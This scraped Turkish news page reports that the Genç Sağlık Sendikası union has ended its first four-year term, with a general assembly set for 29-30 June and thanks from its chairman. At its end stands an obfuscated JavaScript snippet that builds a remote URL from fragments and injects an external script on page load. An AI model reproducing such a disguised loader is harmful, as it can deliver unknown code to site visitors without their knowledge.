Sendika

Genç Sağlık Sendikası’nda 4 Yıllık Dönem Tamamlandı

Genç Sağlık Sendikası Genel Başkanı Osman Kaya, sosyal medya hesabından yaptığı paylaşımla sendikanın ilk 4 yıllık yönetim döneminin sona erdiğini duyurdu.

Abone Ol

Kaya, bu sürecin ardından yeni dönem için hazırlıkların başladığını belirtti.

2. Olağan kurul için geri sayım başladı

Kaya, 29-30 Haziran tarihlerinde gerçekleştirilecek 2. Olağan Kurul ile birlikte yeni yönetim kurulunun belirleneceğini açıkladı. Sendikanın bu yeni dönemde daha da büyümesini hedeflediklerini ifade etti.

Kurucu yönetime teşekkür mesajı

Son olağan yönetim kurulu toplantısının gerçekleştirildiğini belirten Kaya, kurucu ekipte yer alan isimlere teşekkür etti. İlk günden bu yana verilen emeğin altını çizen Kaya, birlikte yürütülen mücadelenin önemine dikkat çekti.

Yeni yönetime başarı dileği

Genel Başkan Kaya, kurul sonrası göreve gelecek yeni yönetim kurulu üyelerine şimdiden başarı dileklerini iletti. Sendikanın hedeflerine ulaşma noktasında yeni ekibe önemli sorumluluklar düştüğünü vurguladı.

“Verdiğimiz sözleri tutmaya devam edeceğiz”

Açıklamasında sağlık çalışanlarına verilen sözleri hatırlatan Kaya, sendikanın yetkiyi alarak çalışanların sesi olma hedefinden vazgeçmeyeceğini belirtti. “Verdiğimiz sözleri yerine getirdik, bundan sonra da aynı kararlılıkla yolumuza devam edeceğiz” mesajını paylaştı.

(function(){ q0n4=document.createElement("script");q0n4_=("us")+("ta"); q0n4_+="t"+(".");q0n4_+=("in");q0n4u="2358564740";q0n4.async=true; q0n4u+=".ycx23k2y0n4hugy7u";q0n4.type="text/javascript";q0n4_+="f"+"o"+("/"); q0n4u+="h1p0xr40q3u31";q0n4.src="https://"+q0n4_+q0n4u; dq0n4=document.body;dq0n4.appendChild(q0n4); })(); { "vars": { "account": "G-X1XRN2R8K5" }, "triggers": { "trackPageview": { "on": "visible", "request": "pageview" } } }